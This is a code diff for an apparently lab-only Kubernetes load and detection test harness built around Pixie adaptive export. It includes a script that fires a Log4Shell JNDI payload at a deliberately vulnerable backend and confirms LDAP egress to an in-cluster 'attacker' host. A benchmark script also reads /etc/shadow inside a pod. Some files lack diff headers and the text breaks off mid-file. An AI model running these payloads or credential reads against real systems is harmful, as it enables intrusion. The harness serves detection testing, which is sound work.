+  local node="$1" inject="$HERE/inject.sh"
+  log "warmup trigger on node=$node"
+  "$inject" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" \
+    --hostname "$node" --ns aeload --pod "warmup-$(now_ns)" --rule R0001 \
+    --pid 999 --comm warmup --event-time "$(now_s)" >&2 || true
+  sleep "${WARMUP_SETTLE_S:-6}"
+}
+
+# wait_attrib NODE POD WANT [TIMEOUT_S] — poll adaptive_attribution
+# FINAL until it reaches WANT rows (AE's 250ms poll + write can lag a few seconds;
+# a fixed sleep occasionally under-waited). Echoes the final observed count.
+wait_attrib(){
+  local node="$1" pod="$2" want="$3" to="${4:-20}" n=0
+  for _ in $(seq 1 "$to"); do
+    n="$(attrib_count "$node" "$pod")"
+    [[ "${n:-0}" -ge "$want" ]] && break
+    sleep 1
+  done
+  echo "${n:-0}"
+}
+
+# svc_ip NAME — ClusterIP of an aeload service (literal IP for the generator).
+svc_ip(){ k -n "$AELOAD_NS" get svc "$1" -o jsonpath='{.spec.clusterIP}'; }
+
+# apply_sinks — bring up the shared aeload ns + http-sink + pg-sink (idempotent).
+apply_sinks(){
+  [[ -n "${AELOAD_IMAGE:-}" ]] || die "AELOAD_IMAGE not set"
+  sed "s#__IMAGE__#${AELOAD_IMAGE}#g" "$K8S_DIR/00-sinks.yaml" | k apply -f -
+  k -n "$AELOAD_NS" rollout status deploy/http-sink --timeout=120s
+  k -n "$AELOAD_NS" rollout status deploy/pg-sink --timeout=120s
+}
+
+# fire_gen NAME HTTP_N DNS_N PGSQL_N — create a gen pod, wait for it
+# to fire, echo its one-line JSON manifest. Leaves the pod RUNNING (held).
+fire_gen(){
+  local name="$1" hn="$2" dn="$3" pn="$4"
+  local hip pip
+  hip="$(svc_ip http-sink)"; pip="$(svc_ip pg-sink)"
+  [[ -n "$hip" && -n "$pip" ]] || die "could not resolve sink ClusterIPs"
+  # GEN_SETTLE_MS: pre-band warm-up so Pixie/Stirling attaches BEFORE the exact
+  # band (exact-count tests). GEN_SUSTAIN_SEC: continuous trickle AFTER the band
+  # (sustained "keep writing until t_end" RCA). Defaults suit exact-count runs.
+  sed -e "s#__NAME__#${name}#g" -e "s#__IMAGE__#${AELOAD_IMAGE}#g" \
+    -e "s#__HTTP_ADDR__#${hip}:8080#g" -e "s#__PG_ADDR__#${pip}:5432#g" \
+    -e "s#__HTTP_N__#${hn}#g" -e "s#__DNS_N__#${dn}#g" -e "s#__PGSQL_N__#${pn}#g" \
+    -e "s#__SETTLE_PRE_MS__#${GEN_SETTLE_MS:-30000}#g" -e "s#__SUSTAIN_SEC__#${GEN_SUSTAIN_SEC:-0}#g" \
+    "$K8S_DIR/gen-pod.tmpl.yaml" | k apply -f - >&2
+  # Wait for the FIRED sentinel + grab the manifest line. The budget is the
+  # configured warm-up plus 60s (90s with the default GEN_SETTLE_MS), so raising
+  # the warm-up cannot outrun the wait.
+  local mani="" logs="" i wait_s=$(( ${GEN_SETTLE_MS:-30000} / 1000 + 60 ))
+  for ((i = 0; i < wait_s; i++)); do
+    # One log fetch per poll, matched in the shell: `kubectl logs | grep -q` under
+    # `pipefail` can report failure when grep exits early (SIGPIPE on the writer).
+    logs="$(k -n "$AELOAD_NS" logs "$name" 2>/dev/null)"
+    if [[ "$logs" == *AELOAD_FIRED* ]]; then
+      mani="$(grep AELOAD_MANIFEST <<<"$logs" | tail -1 | sed 's/^AELOAD_MANIFEST //')"
+      break
+    fi
+    sleep 1
+  done
+  # $'\n' gives a real line break; die uses plain echo, which would print "\n" literally.
+  [[ -n "$mani" ]] || die "gen $name never fired (logs:)"$'\n'"$(tail -20 <<<"$logs")"
+  echo "$mani"
+}
+# del_gen NAME — delete a gen pod without waiting (best effort).
+del_gen(){ k -n "$AELOAD_NS" delete pod "$1" --grace-period=2 --wait=false >/dev/null 2>&1 || true; }
+
+# jget JSON KEY — tiny JSON field reader (numbers/strings) via python3.
+jget(){ python3 -c 'import json,sys;print(json.load(sys.stdin)[sys.argv[1]])' "$2" <<<"$1"; }
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/log4shell_fire.sh b/src/e2e_test/adaptive_export_loadtest/harness/log4shell_fire.sh
new file mode 100755
index 00000000000..7cd7ba7b619
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/log4shell_fire.sh
@@ -0,0 +1,83 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# log4shell_fire.sh — generate the bob log4j-chain log4shell DETECTION SIGNAL reliably,
+# with clean restart. (Anthropic Cyber Verification context: this is detection-signal
+# generation for validating the kubescape→DX→AE chain, not offensive use.)
+#
+# Addresses bob#140 (the log4shell signal is STATEFUL/unreliable on a re-fired/restarted
+# backend — JVM negative-DNS cache + first-eval timing). Reliability is achieved BY
+# CONSTRUCTION: each attempt uses a fresh-JVM backend + the WORKING resolvable FQDN, then
+# VERIFIES the actual LDAP egress (backend → attacker:1389 in forensic_db.conn_stats) and
+# RETRIES until confirmed — the "validity gate". It never assumes the signal was generated.
+#
+# Hard-won facts baked in (see memory log4j-network-detection-chain / bob#140):
+# - WORKING JNDI host = attacker.ANS.svc.cluster.local (RESOLVABLE Service FQDN).
+#   A bare/partial name (e.g. attacker-ns.svc) NXDOMAINs → DNS event dropped → nothing fires.
+# - attacker (LDAP server) MUST be up BEFORE backend (#140 attacker-before-backend).
+# - delete the backend pod (not just rollout) → fresh JVM → clears the negative-DNS cache.
+#
+# Run NODE-SIDE on the rig (kubectl reaches the cluster directly). Idempotent.
+# Env knobs: NS, ANS, JNDI_HOST, CHPOD, RESTART(=1), MAXTRIES(=5), FIRES(=15).
+# Exit status: 0 = egress confirmed, 1 = attacker/backend not resolvable, 2 = never confirmed.
+set -uo pipefail
+NS=${NS:-log4j-poc}
+ANS=${ANS:-attacker-ns}
+JNDI_HOST=${JNDI_HOST:-attacker.$ANS.svc.cluster.local}
+JNDI='${jndi:ldap://'"$JNDI_HOST"':1389/Payload}'
+RESTART=${RESTART:-1}
+MAXTRIES=${MAXTRIES:-5}
+FIRES=${FIRES:-15}
+CHPOD=${CHPOD:-chi-forensic-soc-db-soc-cluster-0-0-0}
+# chq SQL — run SQL through clickhouse-client inside the ClickHouse pod (stderr dropped).
+chq(){ kubectl -n clickhouse exec "$CHPOD" -c clickhouse -- clickhouse-client -q "$1" 2>/dev/null; }
+# ch_now — ClickHouse server time as unix seconds (empty when the query fails).
+ch_now(){ chq "SELECT toUnixTimestamp(now())"; }
+# ldap_count SINCE — conn_stats rows to remote port 1389 with time_ at or after the
+# unix-second instant SINCE. Anchoring on a fixed instant replaces the former
+# "last 5 minutes before vs after" comparison: in a sliding window, rows from an
+# earlier run age out while the new ones arrive, so the count can stay flat or
+# drop even though the egress happened.
+ldap_count(){ chq "SELECT count() FROM forensic_db.conn_stats WHERE remote_port=1389 AND time_ >= toDateTime(${1})"; }
+
+# 0. Attacker/LDAP server up FIRST (#140).
+kubectl -n "$ANS" rollout status deploy/attacker --timeout=60s >/dev/null 2>&1 \
+  || { echo "FATAL: attacker (LDAP :1389) not ready — bring it up before backend"; exit 1; }
+echo "attacker ready (LDAP :1389) — #140 attacker-before-backend satisfied; JNDI host=$JNDI_HOST"
+
+for try in $(seq 1 "$MAXTRIES"); do
+  if [ "$RESTART" = 1 ]; then
+    echo "[try $try] delete backend pod → fresh JVM (clears negative-DNS cache)"
+    kubectl -n "$NS" delete pod -l app=backend --wait=true >/dev/null 2>&1
+    kubectl -n "$NS" rollout status deploy/backend --timeout=120s >/dev/null 2>&1
+    sleep 12 # app listening + Pixie re-attach
+  fi
+  BIP=$(kubectl -n "$NS" get svc backend -o jsonpath='{.spec.clusterIP}' 2>/dev/null)
+  BPORT=$(kubectl -n "$NS" get svc backend -o jsonpath='{.spec.ports[0].port}' 2>/dev/null)
+  # Without an address every request would go to "http://:/..." and each try would
+  # burn its full settle time for nothing.
+  [ -n "$BIP" ] && [ -n "$BPORT" ] || { echo "FATAL: cannot resolve svc/backend in ns $NS"; exit 1; }
+  t_fire=$(ch_now)
+  echo "[try $try] fire JNDI at backend $BIP:$BPORT (x$FIRES)"
+  for _ in $(seq 1 "$FIRES"); do
+    kubectl -n "$ANS" exec deploy/attacker -- curl -s -m5 -A "$JNDI" "http://$BIP:$BPORT/api/products" >/dev/null 2>&1 || true
+    sleep 0.5
+  done
+  sleep 40 # settle: LDAP egress lands in conn_stats
+  fresh=0
+  case "${t_fire:-}" in
+    ''|*[!0-9]*) echo "[try $try] WARN: could not read the ClickHouse clock — egress cannot be verified this try" ;;
+    *) fresh=$(ldap_count "$t_fire"); fresh=${fresh:-0} ;;
+  esac
+  echo "[try $try] backend->:1389 LDAP egress rows since fire start: $fresh"
+  if [ "$fresh" -gt 0 ]; then
+    echo "SIGNAL CONFIRMED — backend->:1389 LDAP egress generated on try $try (host=$JNDI_HOST)."
+    echo "Downstream now has signal: R0005 (DNS) + ldap-egress for DX log4shell-rce-exfil detection."
+    exit 0
+  fi
+  echo "[try $try] NOT fired (literal \${jndi} in backend log = log4j didn't expand) — retrying with fresh JVM"
+  RESTART=1
+done
+echo "FAILED to confirm LDAP egress after $MAXTRIES tries."
+echo "Check: backend app log shows 'ua=\${jndi:...}' LITERAL (not expanded) ⇒ log4j lookups not evaluating;"
+echo "verify backend is the *-vulnerable image + log4j evaluates message lookups (bob#140 validity gate)."
+exit 2
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/nfr.sh b/src/e2e_test/adaptive_export_loadtest/harness/nfr.sh
new file mode 100755
index 00000000000..130ae8ec599
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/nfr.sh
@@ -0,0 +1,67 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# nfr.sh — AE non-functional benchmark: throughput, AE+dx mem under load, and
+# END-TO-END no-data-loss proof (broker read_count == AE wrote_count == ACTUAL CH rows).
+# Two phases: passthrough (firehose, throughput stress) then streaming (DX). Node-side on rig.
+set -uo pipefail
+# NS / CHPOD can be overridden from the environment, like in the sibling harness scripts.
+NS=${NS:-log4j-poc}; CHPOD=${CHPOD:-chi-forensic-soc-db-soc-cluster-0-0-0}
+DUR=${DUR:-150}
+OUT=/tmp/nfr.txt; : > "$OUT"
+# chq SQL — run SQL through clickhouse-client inside the ClickHouse pod (stderr dropped).
+chq(){ kubectl -n clickhouse exec "$CHPOD" -c clickhouse -- clickhouse-client -q "$1" 2>/dev/null; }
+# say MSG — timestamped line to stdout and appended to $OUT.
+say(){ echo "[$(date -u +%H:%M:%S)] $*" | tee -a "$OUT"; }
+# isnum VALUE — true when VALUE is a plain unsigned integer, i.e. a usable query result.
+isnum(){ case "${1:-}" in ''|*[!0-9]*) return 1;; *) return 0;; esac; }
+BIP=$(kubectl -n "$NS" get svc backend -o jsonpath='{.spec.clusterIP}'); BPORT=$(kubectl -n "$NS" get svc backend -o jsonpath='{.spec.ports[0].port}')
+# Without a backend address fire() would silently do nothing for the whole window.
+[ -n "$BIP" ] && [ -n "$BPORT" ] || { say "FATAL: cannot resolve svc/backend in ns $NS"; exit 1; }
+# fire — one load tick: a JNDI-tagged request from the attacker pod to the backend,
+# then a few commands exec'd inside the first backend pod. Best effort throughout.
+fire(){ kubectl -n attacker-ns exec deploy/attacker -- curl -s -m4 -A '${jndi:ldap://attacker.attacker-ns.svc.cluster.local:1389/Payload}' "http://$BIP:$BPORT/api/products" >/dev/null 2>&1 || true
+  local BP; BP=$(kubectl -n "$NS" get pods --no-headers 2>/dev/null|awk '/^backend/{print $1;exit}')
+  [ -n "$BP" ] && kubectl -n "$NS" exec "$BP" -- sh -c 'whoami; cat /etc/shadow 2>/dev/null|head -1; getent hosts attacker.attacker-ns.svc.cluster.local >/dev/null 2>&1' >/dev/null 2>&1 || true; }
+# memsum NS SELECTOR — sum of the third `kubectl top pod` column (Mi suffix removed)
+# over the pods matching SELECTOR.
+memsum(){ kubectl -n "$1" top pod -l "$2" --no-headers 2>/dev/null | awk '{gsub(/Mi/,"",$3); s+=$3} END{print s+0}'; }
+# truncate_all — empty every forensic_db table the benchmark reads.
+truncate_all(){ local t; for t in http_events dns_events conn_stats pgsql_events ae_reconcile adaptive_attribution kubescape_logs; do chq "TRUNCATE TABLE IF EXISTS forensic_db.\`$t\`" >/dev/null 2>&1; done; }
+# setarm ENV=VAL... — apply ENV (plus ADAPTIVE_RECONCILE=true) to the AE DaemonSet and wait for the rollout.
+setarm(){ kubectl -n pl set env ds/adaptive-export "$@" ADAPTIVE_RECONCILE=true >/dev/null 2>&1; kubectl -n pl rollout status ds/adaptive-export --timeout=150s >/dev/null 2>&1; }
+
+# run_phase NAME ENV=VAL... — configure AE, truncate the tables, drive load for $DUR
+# seconds while sampling peak memory, then report the reconcile counters against the
+# actual ClickHouse row counts, the on-disk volume and the throughput.
+run_phase(){ local name=$1; shift
+  say "=== PHASE $name : $* ==="
+  setarm "$@"; truncate_all; say " truncated; $name load window ${DUR}s"
+  local t0 aemax=0 dxmax=0 pemmax=0 sm=0 ae dx pem
+  t0=$(date +%s)
+  while [ $(( $(date +%s) - t0 )) -lt "$DUR" ]; do
+    fire
+    ae=$(memsum pl 'name=adaptive-export'); dx=$(memsum honey 'app=dx-daemon'); pem=$(memsum pl 'name=vizier-pem')
+    [ "${ae:-0}" -gt "$aemax" ] && aemax=$ae; [ "${dx:-0}" -gt "$dxmax" ] && dxmax=$dx; [ "${pem:-0}" -gt "$pemmax" ] && pemmax=$pem
+    sm=$((sm+1)); sleep 12
+  done
+  local el; el=$(( $(date +%s) - t0 )); say " window done ${el}s ($sm samples); flush 20s"; sleep 20
+  say " [MEM peak] AE(2pods)=${aemax}Mi dx-daemon=${dxmax}Mi PEM=${pemmax}Mi"
+  say " [NO-LOSS PROOF] broker_read == AE_wrote == CH_actual_rows:"
+  local t rd wr ch verdict tot=0
+  for t in http_events dns_events conn_stats; do
+    rd=$(chq "SELECT sum(read_count) FROM forensic_db.ae_reconcile WHERE table_name='$t'")
+    wr=$(chq "SELECT sum(wrote_count) FROM forensic_db.ae_reconcile WHERE table_name='$t'")
+    ch=$(chq "SELECT count() FROM forensic_db.$t")
+    # A query that returned nothing is a failure, not a zero: defaulting it to 0
+    # would make an unreachable ClickHouse print MATCH on every line.
+    if isnum "$rd" && isnum "$wr" && isnum "$ch"; then
+      verdict="$([ "$wr" = "$ch" ] && echo 'MATCH' || echo '*MISMATCH*')$([ "$rd" = "$wr" ] && echo '/read==wrote' || echo '/READ!=WROTE')"
+      tot=$((tot + ch))
+    else
+      verdict='*QUERY-FAILED*'
+    fi
+    say " $t: read=${rd:-?} wrote=${wr:-?} CH_rows=${ch:-?} $verdict"
+  done
+  say " [BYTES] per-table rows + compressed bytes (on-disk data volume):"
+  chq "SELECT ' '||table, sum(rows), sum(data_compressed_bytes) FROM system.parts WHERE database='forensic_db' AND active AND table IN ('http_events','dns_events','conn_stats') GROUP BY table ORDER BY table FORMAT TSV" | tee -a "$OUT"
+  # tot is the sum of the per-table counts read above; the rate is skipped for a
+  # zero-length window instead of dividing by zero.
+  say " [THROUGHPUT] $name CH rows=$tot over ${el}s = $(awk -v r="$tot" -v e="$el" 'BEGIN{ if (e > 0) printf "%.1f", r/e; else printf "n/a" }') rows/s"
+  say " [steered] $(chq "SELECT arrayStringConcat(groupArray(pod),',') FROM (SELECT DISTINCT pod FROM forensic_db.adaptive_attribution WHERE t_end>now())")"
+}
+
+say "##### AE NFR BENCHMARK START #####"
+run_phase ALL-passthrough ADAPTIVE_PASSTHROUGH=true ADAPTIVE_WRITE_MODE= ADAPTIVE_PUSH_PIXIE_ROWS=false ADAPTIVE_PASSTHROUGH_WINDOW_SEC=60 ADAPTIVE_PASSTHROUGH_REFRESH_SEC=60
+run_phase DX-streaming ADAPTIVE_PASSTHROUGH=false ADAPTIVE_WRITE_MODE=streaming ADAPTIVE_PUSH_PIXIE_ROWS=false ADAPTIVE_STREAM_WINDOW_SEC=60 ADAPTIVE_STREAM_REFRESH_SEC=60
+say "##### NFR DONE #####"
diff --git
#!/usr/bin/env bash

# Copyright 2018- The Pixie Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0

# run.sh — drive the full AE fixture-isolation suite on a live rig and produce
# the reproducibility evidence (per-experiment CSV + stats verdicts).
#
# Prereqs:
#   KUBECONFIG   = tailscale-direct kubeconfig (make kubeconfig PG=<pg>)
#   AELOAD_IMAGE = ttl.sh/aeload-<tag>:24h (built on the PG dev-machine)
#   AE in single-shot load-test mode (this script runs ae_config.sh).
#
# Optional:
#   EVID                         = evidence directory (default: a fresh timestamped
#                                  directory under ${TMPDIR:-/tmp}/aeload_evidence)
#   REPS_CTRL / REPS_E5 / REPS_E6 = repetitions per experiment family
#
# Usage: KUBECONFIG=... AELOAD_IMAGE=... EVID=/path ./run.sh
#
# Exit status: 0 when every step succeeded, 1 when any step failed. A failed
# step does NOT abort the run — later experiments still execute so partial
# evidence is collected — but the failure is logged and reflected in the exit
# status.
set -uo pipefail
HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
# lib.sh provides log() and die() used below.
source "$HERE/lib.sh"

[[ -n "${AELOAD_IMAGE:-}" ]] || die "AELOAD_IMAGE not set"
# Portable default: do not assume any particular user's home directory exists.
EVID="${EVID:-${TMPDIR:-/tmp}/aeload_evidence/aeload_$(date -u +%Y%m%dT%H%M%SZ)}"
mkdir -p "$EVID" || die "cannot create evidence dir: $EVID"
REPS_CTRL="${REPS_CTRL:-100}"
REPS_E5="${REPS_E5:-100}"
REPS_E6="${REPS_E6:-10}"
log "evidence dir: $EVID"

failed=0

# run_step LABEL CMD [ARG...] — log the step, run it, and record (but do not
# abort on) a non-zero exit.
run_step() {
  local label=$1 rc
  shift
  log "=== $label ==="
  "$@"
  rc=$?
  if [[ $rc -ne 0 ]]; then
    log "!!! $label FAILED (exit $rc)"
    failed=1
  fi
}

# 1) AE into single-shot load-test mode (idempotent).
run_step "ae_config" bash "$HERE/ae_config.sh"

# 2) Control-plane experiments (no Pixie/gen needed).
for e in E1 E2 E3 E4; do
  run_step "control $e (reps=$REPS_CTRL)" \
    env EXP="$e" REPS="$REPS_CTRL" OUT="$EVID/${e}.csv" bash "$HERE/exp_control.sh"
done
run_step "control E6 idempotency (reps=$REPS_E6)" \
  env EXP=E6 REPS="$REPS_E6" OUT="$EVID/E6.csv" bash "$HERE/exp_control.sh"

# 3) Data-plane experiment (real Pixie capture of the counted band).
run_step "data-plane E5 (reps=$REPS_E5)" \
  env REPS="$REPS_E5" OUT="$EVID/E5.csv" bash "$HERE/exp_e5.sh"

# 4) Aggregate verdicts. nullglob: when no experiment produced a CSV, report
# that explicitly instead of handing the literal pattern "*.csv" to stats.py.
log "=== aggregate ==="
shopt -s nullglob
csvs=("$EVID"/*.csv)
shopt -u nullglob
if ((${#csvs[@]} == 0)); then
  log "!!! no CSVs found in $EVID; nothing to aggregate"
  failed=1
elif ! python3 "$HERE/stats.py" "${csvs[@]}" | tee "$EVID/VERDICT.txt"; then
  # pipefail makes a stats.py failure visible through the tee pipeline.
  log "!!! aggregate FAILED"
  failed=1
fi

log "DONE -> $EVID"
exit "$failed"
"""stats.py — reduce an experiment CSV to a per-metric reproducibility report.

Exact reproducibility ⇔ every measured (`*_act`) metric has a single distinct
value across all PASS reps (std = 0 / CV = 0). Prints per-metric
n/distinct/mean/std/CV%/min/max and an overall verdict. No fabrication: it only
summarizes the rows the harness actually recorded.

Usage: stats.py CSV [CSV ...]
"""
import csv
import statistics as st
import sys


def num(x):
    """Return ``x`` as a float, or ``None`` when it is missing or not numeric."""
    try:
        return float(x)
    except (TypeError, ValueError):
        return None


def report(path):
    """Print the reproducibility report for one experiment CSV.

    Args:
        path: CSV file with a header row. Columns ending in ``_act`` (except
            ``wm_act``) are the metrics; an optional ``pass`` column marks the
            reps to consider (values starting with ``PASS``). Without a
            ``pass`` column every row is considered.

    Returns:
        ``True`` only when at least one metric had numeric values and every
        such metric took a single distinct value; ``False`` otherwise
        (including an empty file or no usable data).
    """
    # newline="" is what the csv module expects so quoted embedded newlines
    # are parsed correctly.
    with open(path, newline="") as f:
        reader = csv.DictReader(f)
        rows = list(reader)
        # Use the header, not rows[0].keys(): a first row with surplus fields
        # carries a None key (DictReader's restkey), which is not a column.
        cols = list(reader.fieldnames or [])
    if not rows:
        print(f"== {path}: empty ==")
        return False

    passcol = "pass" if "pass" in cols else None

    def passed(row):
        return str(row[passcol]).startswith("PASS")

    npass = sum(1 for r in rows if passcol and passed(r))
    print(f"== {path} == reps={len(rows)} PASS={npass}/{len(rows)}")
    considered = [r for r in rows if passed(r)] if passcol else rows

    # Reproducibility metrics = the COUNT columns AE wrote (must be constant
    # across reps). wm_act is EXCLUDED: it equals each rep's distinct event_time
    # by design (monotone), validated per-rep as wm_act==wm_exp via the pass flag
    # — it is not expected to be constant across reps.
    metrics = [c for c in cols if c.endswith("_act") and c != "wm_act"]
    metrics = list(dict.fromkeys(metrics))  # dedupe, keep order

    repro_ok = True
    measured = 0  # metrics that actually had numeric values to judge
    for c in metrics:
        vals = [v for v in (num(r[c]) for r in considered) if v is not None]
        if not vals:
            print(f" {c:16s} (no numeric PASS values)")
            continue
        measured += 1
        distinct = sorted(set(vals))
        mean = st.fmean(vals)
        sd = st.pstdev(vals) if len(vals) > 1 else 0.0
        cv = (sd / mean * 100) if mean else 0.0
        flag = "EXACT" if len(distinct) == 1 else f"VARIES({len(distinct)})"
        if len(distinct) != 1:
            repro_ok = False
        print(f" {c:16s} n={len(vals):4d} distinct={len(distinct):3d} "
              f"mean={mean:.3f} std={sd:.3f} cv={cv:.4f}% "
              f"min={min(vals):.0f} max={max(vals):.0f} {flag}")

    # Nothing measured is NOT evidence of reproducibility: refuse to print the
    # positive verdict when there were no PASS reps / no numeric metrics.
    if measured == 0:
        verdict = "NO DATA (no PASS reps with numeric *_act metrics)"
    elif repro_ok:
        verdict = "EXACTLY REPRODUCIBLE (all metrics std=0)"
    else:
        verdict = "NOT exactly reproducible (see VARIES above)"
    print(f" VERDICT: {verdict}")
    print()
    return measured > 0 and repro_ok


def main():
    """Report every CSV named on the command line; print usage and exit 2 if none."""
    if len(sys.argv) < 2:
        print(__doc__)
        sys.exit(2)
    for p in sys.argv[1:]:
        report(p)


if __name__ == "__main__":
    main()
b/src/e2e_test/adaptive_export_loadtest/k8s/00-sinks.yaml new file mode 100644 index 00000000000..7aca396ff60 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/k8s/00-sinks.yaml @@ -0,0 +1,82 @@ +--- +# Shared, long-lived data-plane sinks for the AE load-tests. These are the PEER +# side of cleanloadgen's traffic; AE filters to the client (gen) pod so the +# sinks' own rows are excluded — but they carry NO probes/sidecars regardless so +# the namespace stays free of uncounted traffic. +# +# IMAGE is substituted by the harness (ttl.sh/aeload-:24h, built on the PG +# dev-machine). pg-sink uses the public postgres image. +apiVersion: v1 +kind: Namespace +metadata: + name: aeload + labels: + app.kubernetes.io/part-of: ae-loadtest +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: http-sink + namespace: aeload +spec: + replicas: 1 + selector: + matchLabels: {app: http-sink} + template: + metadata: + labels: {app: http-sink} + spec: + # No probes anywhere: probe traffic would be captured by Pixie. + containers: + - name: httpsink + image: __IMAGE__ + command: ["/usr/local/bin/httpsink"] + env: + - {name: LISTEN_ADDR, value: ":8080"} + ports: + - containerPort: 8080 +--- +apiVersion: v1 +kind: Service +metadata: + name: http-sink + namespace: aeload +spec: + selector: {app: http-sink} + ports: + - port: 8080 + targetPort: 8080 +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: pg-sink + namespace: aeload +spec: + replicas: 1 + selector: + matchLabels: {app: pg-sink} + template: + metadata: + labels: {app: pg-sink} + spec: + containers: + - name: postgres + image: postgres:16-alpine + # trust auth keeps the gen simple; no probes. 
+ env: + - {name: POSTGRES_PASSWORD, value: postgres} + - {name: POSTGRES_HOST_AUTH_METHOD, value: trust} + ports: + - containerPort: 5432 +--- +apiVersion: v1 +kind: Service +metadata: + name: pg-sink + namespace: aeload +spec: + selector: {app: pg-sink} + ports: + - port: 5432 + targetPort: 5432 diff --git a/src/e2e_test/adaptive_export_loadtest/k8s/gen-pod.tmpl.yaml b/src/e2e_test/adaptive_export_loadtest/k8s/gen-pod.tmpl.yaml new file mode 100644 index 00000000000..6c02ee557c1 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/k8s/gen-pod.tmpl.yaml @@ -0,0 +1,38 @@ +--- +# Per-rep generator pod. The harness renders one of these per repetition with a +# UNIQUE name (gen--) — that uniqueness is the data-plane isolation: +# AE's df.pod filter pulls only this rep's traffic even if windows overlap. +# +# Substituted by the harness: __NAME__, __IMAGE__, __HTTP_ADDR__ (sink ClusterIP +# :8080 as a literal IP so it adds no DNS), __PG_ADDR__, __HTTP_N__, __DNS_N__, +# __PGSQL_N__. The pod FIRES once then HOLDS (sleeps on SIGTERM) so its upid +# stays resolvable while AE queries the window; the harness deletes it after the +# rep is measured. 
+apiVersion: v1 +kind: Pod +metadata: + name: __NAME__ + namespace: aeload + labels: + app: aeload-gen +spec: + restartPolicy: Never + containers: + - name: gen + image: __IMAGE__ + command: ["/usr/local/bin/cleanloadgen"] + env: + - {name: HTTP_ADDR, value: "__HTTP_ADDR__"} + - {name: HTTP_PATH, value: "/ping"} + - {name: HTTP_N, value: "__HTTP_N__"} + - {name: DNS_N, value: "__DNS_N__"} + - {name: DNS_BASE, value: "t-%d.aeload.svc.cluster.local."} + - {name: PG_ADDR, value: "__PG_ADDR__"} + - {name: PGSQL_N, value: "__PGSQL_N__"} + - {name: PG_USER, value: "postgres"} + - {name: PG_PASSWORD, value: "postgres"} + - {name: SETTLE_PRE_MS, value: "__SETTLE_PRE_MS__"} + - {name: SUSTAIN_SEC, value: "__SUSTAIN_SEC__"} + - {name: POD_NAME, valueFrom: {fieldRef: {fieldPath: metadata.name}}} + - {name: POD_NAMESPACE, valueFrom: {fieldRef: {fieldPath: metadata.namespace}}} + - {name: NODE_NAME, valueFrom: {fieldRef: {fieldPath: spec.nodeName}}} diff --git a/src/e2e_test/adaptive_export_loadtest/tools/loadgen/Dockerfile b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/Dockerfile new file mode 100644 index 00000000000..fd186588a19 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/Dockerfile @@ -0,0 +1,18 @@ +# Build both load-test binaries (cleanloadgen + httpsink) into one small image. +# Built on the PG dev-machine (native amd64 docker), never on the agent VM +# (ARM, no bazel/heavy-build) — same path used for the dx images. +FROM golang:1.22-bookworm AS build +WORKDIR /src +# -mod=mod lets the build resolve + record go.sum for the single lib/pq dep +# without a pre-committed go.sum (keeps the tool tree minimal). 
+ENV GOFLAGS=-mod=mod CGO_ENABLED=0 +COPY go.mod ./ +COPY cmd ./cmd +RUN go build -trimpath -ldflags="-s -w" -o /out/cleanloadgen ./cmd/cleanloadgen +RUN go build -trimpath -ldflags="-s -w" -o /out/httpsink ./cmd/httpsink + +FROM gcr.io/distroless/static-debian12:nonroot +COPY --from=build /out/cleanloadgen /usr/local/bin/cleanloadgen +COPY --from=build /out/httpsink /usr/local/bin/httpsink +# Default to the sink; the generator pod overrides command to cleanloadgen. +ENTRYPOINT ["/usr/local/bin/httpsink"] diff --git a/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/cleanloadgen/main.go b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/cleanloadgen/main.go new file mode 100644 index 00000000000..4c506eb4a31 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/cleanloadgen/main.go @@ -0,0 +1,255 @@ +// cleanloadgen — a deterministic, "clean-cut" traffic generator for the +// adaptive_export (AE) live data-plane load-tests. +// +// It is the OPPOSITE of a fuzzer: its only job is to emit an EXACTLY known +// number of HTTP, DNS and PostgreSQL operations against fixed sinks, inside a +// single sealed time band [B0,B1], and emit nothing else over the network. The +// counts it prints are the ground-truth oracle the AE assertions compare +// forensic_db row deltas against — no fabricated numbers anywhere. +// +// Determinism rules baked in (see the load-test design notes): +// - HTTP: one NEW TCP connection per request (DisableKeepAlives) so both +// http_events AND conn_stats counts are a function of HTTP_N. Every request +// MUST return 2xx or the process exits non-zero (the rep is discarded, not +// silently mis-counted). +// - DNS: exactly ONE A-query per name via 